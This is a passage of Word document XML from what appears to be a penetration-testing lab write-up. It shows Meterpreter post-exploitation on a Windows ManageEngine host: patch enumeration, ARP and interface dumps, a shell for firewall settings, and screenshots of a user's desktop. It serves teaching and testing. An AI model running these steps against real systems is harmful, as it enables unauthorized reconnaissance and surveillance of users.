    <w:p w14:paraId="5D578333" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01511705" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> SID                                          Profile Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECC5FA" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ---                                          ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73D345" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> S-1-5-18                                     %systemroot%\system32\config\systemprofile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D0667" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> S-1-5-19                                     C:\Windows\ServiceProfiles\LocalService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B50BF" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> S-1-5-20                                     C:\Windows\ServiceProfiles\NetworkService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D05731F" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> S-1-5-21-91035301-3286527290-355893404-1000  C:\Users\vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E64E6" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> S-1-5-21-91035301-3286527290-355893404-1002  C:\Users\sshd_server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A118FF6" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECCCA5A" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517BAD72" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; run post/windows/gather/enum_patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9C496" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B75D9F" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] KB2871997 is missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F8045" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] KB2928120 is missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113590CE" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="00B616D6" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095EF7DF" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; arp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57DF7C" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152557BD" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ARP cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3B045" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>=========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE3344" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F17646" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    IP address       MAC address        Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6153023E" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ----------       -----------        ---------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889E1CF" w14:textId="3EDD2795" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    00:50:56:b5:57:88  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8A181" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    192.168.22.254   00:50:56:b5:f4:82  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48D3DE" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    192.168.22.255   ff:ff:ff:ff:ff:ff  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4A4D2" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    224.0.0.22       00:00:00:00:00:00  1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3463D678" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    224.0.0.22       01:00:5e:00:00:16  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75278CB0" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    224.0.0.251      01:00:5e:00:00:fb  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D26A4" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    224.0.0.252      01:00:5e:00:00:fc  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD007DD" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    224.2.2.4        01:00:5e:02:02:04  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACAA286" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    239.77.124.213   00:00:00:00:00:00  1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC99E42" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    239.77.124.213   01:00:5e:4d:7c:d5  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C930ED" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    255.255.255.255  ff:ff:ff:ff:ff:ff  15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6866E41D" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4A1B94" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10DDF3" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1F7D4E" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Interface  1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191704DC" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23223893" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Name         : Software Loopback Interface 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E13245" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Hardware MAC : 00:00:00:00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44527D39" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MTU          : 4294967295</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9ACCCC" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv4 Address : 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF86D2" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv4 Netmask : 255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D428E4" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6 Address : ::1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A317D61" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659A4027" w14:textId="77777777" w:rsidR="00032E3E" w:rsidRDefault="00032E3E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DD79D0" w14:textId="5072F7D3" w:rsidR="00F50A9E" w:rsidRPr="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>It can be useful to get Firewall configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA8D13" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F02C621" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Process 5148 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877AA9D" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Channel 2 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D945F1" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft Windows [Version 6.1.7601]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D0099" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Copyright (c) 2009 Microsoft Corporation.  All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ECC373" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5712F2C2" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C:\ManageEngine\DesktopCentral_Server\bin&gt;netsh firewall show opmode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF7F078" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>netsh firewall show opmode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED0E5F7" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F12FB50" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain profile configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264009F3" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA799C" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Operational mode                  = Enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA81057" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exception mode                    = Enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87BC0F" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B469637" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Standard profile configuration (current):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFDA51B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B3D094" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Operational mode                  = Enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B559A73" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exception mode                    = Enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E132212" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0EBC6B" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>IMPORTANT: Command executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F3155" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>However, "netsh firewall" is deprecated;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F46944" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>use "netsh advfirewall firewall" instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7711F3" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>For more information on using "netsh advfirewall firewall" commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF84C40" w14:textId="77777777" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>instead of "netsh firewall", see KB article 947709</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511128F2" w14:textId="5F8E590F" w:rsidR="00F50A9E" w:rsidRDefault="00F50A9E" w:rsidP="00F50A9E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>at http://go.microsoft.com/fwlink/?linkid=121488 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368B429" w14:textId="77777777" w:rsidR="00032E3E" w:rsidRDefault="00032E3E" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FB746E" w14:textId="02B84CD8" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Finally, we can take a screenshot of the vagrant user’s desktop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D1F7D" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; enumdesktops </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDE90A" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerating all accessible desktops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4211C3F4" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E973EA2" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Desktops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4AADBC" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>========</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF7D9D2" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616BFC91" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Session  Station  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5381F" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -------  -------  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706B0E3" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    0        WinSta0  Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BCD413" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    0        WinSta0  Disconnect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520AE0E" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    0        WinSta0  Winlogon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1F7B2" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194852BD" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069AE5CB" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">meterpreter &gt; getdesktop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6E5B02" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session 0\S\D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A659C1" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE2F08" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot saved to: /root/KsbSJYsH.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF31A8" w14:textId="77777777" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C40DFA" w14:textId="4C3BD92D" w:rsidR="004E0401" w:rsidRDefault="004E0401" w:rsidP="004E0401">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot saved to: /root/yEqyMWEU.jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F077940" w14:textId="221188D0" w:rsidR="007B48A5" w:rsidRDefault="004A0C5C" w:rsidP="007B48A5">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4457F51D" wp14:editId="3F0AF65F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>298450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3286760" cy="1376045"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="146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sbSJYsH.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86760" cy="137604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394145A8" w14:textId="15BA56A0" w:rsidR="004A0C5C" w:rsidRPr="007B48A5" w:rsidRDefault="004A0C5C" w:rsidP="007B48A5">
      <w:pPr>
